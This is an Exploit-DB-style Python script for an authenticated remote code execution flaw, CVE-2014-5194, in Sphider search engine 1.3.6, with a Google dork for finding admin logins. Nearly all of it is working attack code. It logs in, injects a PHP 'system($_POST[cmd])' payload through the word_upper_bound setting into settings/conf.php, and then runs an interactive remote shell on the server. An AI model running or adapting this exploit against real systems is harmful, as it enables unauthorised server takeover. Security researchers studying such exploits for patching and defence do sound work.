# Exploit Title: Sphider Search Engine 1.3.6 - 'word_upper_bound' RCE (Authenticated) # Google Dork: intitle:"Sphider Admin Login" # Date: 2014-07-28 # Exploit Author: Gurkirat Singh # Vendor Homepage: http://www.sphider.eu/ # Software Link: http://www.sphider.eu/sphider-1.3.6.zip # Version: v1.3.6 # Tested on: Windows and Linux # CVE : CVE-2014-5194 # Proof of Concept: https://www.exploit-db.com/exploits/34189 from argparse import ArgumentParser, RawTextHelpFormatter from huepy import * import string import random from bs4 import BeautifulSoup, Tag from requests import Session from randua import generate as randua _F = "".join(random.choices(string.ascii_letters, k=13)) parser = ArgumentParser(description="Exploit for CVE-2014-5194", formatter_class=RawTextHelpFormatter) parser.add_argument("--target", "-t", help="target uri where application is installed", required=True, metavar="", dest="t") parser.add_argument("--user", "-u", help="username to authenticate", required=True, metavar="", dest="u") parser.add_argument("--password", "-p", help="password to authenticate", required=True, metavar="", dest="p") parser.add_argument("--debug", help="if passed, spawn the firefox window", default=True, action="store_false") parser.add_argument("--timeout", help="timeout in seconds (default: 1)", dest="T", metavar="", default=1) args = parser.parse_args() if args.t.endswith("/"): args.t = args.t[:-1] print(run("Logging in")) with Session() as http: data = {"user": args.u, "pass": args.p} headers = {"User-Agent": randua()} http.post(args.t + '/admin/auth.php', data=data, headers=headers, allow_redirects=False) r = http.get(args.t + '/admin/admin.php', headers=headers, allow_redirects=False) html = BeautifulSoup(r.content.decode(), "lxml") title: Tag = html.find("title") if title.text == "Sphider Admin Login": print(bad("Failed to login")) exit(1) else: print(good("Logged in")) payload = { 'f': 'settings', 'Submit': '1', '_version_nr': '1.3.5', '_language': 'en', '_template': 'standard', '_admin_email': 'admin@localhost', '_print_results': '1', '_tmp_dir': 'tmp', '_log_dir': 'log', '_log_format': 'html', '_min_words_per_page': '10', '_min_word_length': '3', '_word_upper_bound': '100;system($_POST[cmd])', '_index_numbers': '1', '_index_meta_keywords': '1', '_pdftotext_path': 'c:\\temp\\pdftotext.exe', '_catdoc_path': 'c:\\temp\\catdoc.exe', '_xls2csv_path': 'c:\\temp\\xls2csv', '_catppt_path': 'c:\\temp\\catppt', '_user_agent': 'Sphider', '_min_delay': '0', '_strip_sessids': '1', '_results_per_page': '10', '_cat_columns': '2', '_bound_search_result': '0', '_length_of_link_desc': '0', '_links_to_next': '9', '_show_meta_description': '1', '_show_query_scores': '1', '_show_categories': '1', '_desc_length': '250', '_did_you_mean_enabled': '1', '_suggest_enabled': '1', '_suggest_history': '1', '_suggest_rows': '10', '_title_weight': '20', '_domain_weight': '60', '_path_weight': '10', '_meta_weight': '5' } print(run("Exploiting")) http.post(args.t + "/admin/admin.php", data=payload) r = http.post(args.t + "/settings/conf.php", data={"cmd": "echo %s" % _F}) if r.content.decode().strip() != _F: print(bad("Failed")) exit(1) print(good("Exploited")) print(info("Spawning Shell")) user = http.post(args.t + "/settings/conf.php", data={"cmd": "whoami"}) host = http.post(args.t + "/settings/conf.php", data={"cmd": "cat /etc/hostname"}) shell = f"{lightgreen('%s@%s'%(user.content.decode().strip(), host.content.decode().strip()))}{blue('$ ')}" while True: try: cmd = input(shell) if cmd == "exit": break r = http.post(args.t + "/settings/conf.php", data={"cmd": cmd}) print(r.content.decode().strip()) except: break print()